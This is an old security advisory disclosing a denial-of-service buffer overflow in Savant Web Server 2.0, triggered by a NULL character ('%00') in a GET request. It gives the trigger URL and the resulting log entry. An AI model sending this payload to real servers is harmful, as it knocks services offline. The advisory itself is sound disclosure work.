Vulnerability

    Savant Web Server

Affected

    Savant Web Server V2.0 WIN9X / NT / 2K

Description

    Savant  provides  support  for   most  modern  web  features   and
    technologies, including:

        Common Gateway Interface (CGI) 1.0 and 1.1
        HTTP 0.9, 1.0, and 1.1 including keep-alive ability
        Comprehensive logging in the standard NCSA format
        User and group management
        Password protection
        Server-side image maps
        Support for over 40 file types, including MP3, RealAudio,  and
        Microsoft Office files
        XML, JavaScript, Java, and ActiveX, and more!

    UssrLabs found a local/remote Buffer overflow,the buffer  overflow
    is caused by a NULL  Character in the parsing Get  Command rutine.
    As for example, in Internet Explorer put address address:

        htpp://SavantServerIP/%00/

    The D.O.S action is logged in, C:\Savant\Logs\general.txt,  inside
    looks like this one

        Attacker Ip - - [20/Dec/1999:00:10:27 -0300] "GET
        /%00/index.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.
        htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.html" 301 279

Solution

    Nothing yet, but vendor has been contacted.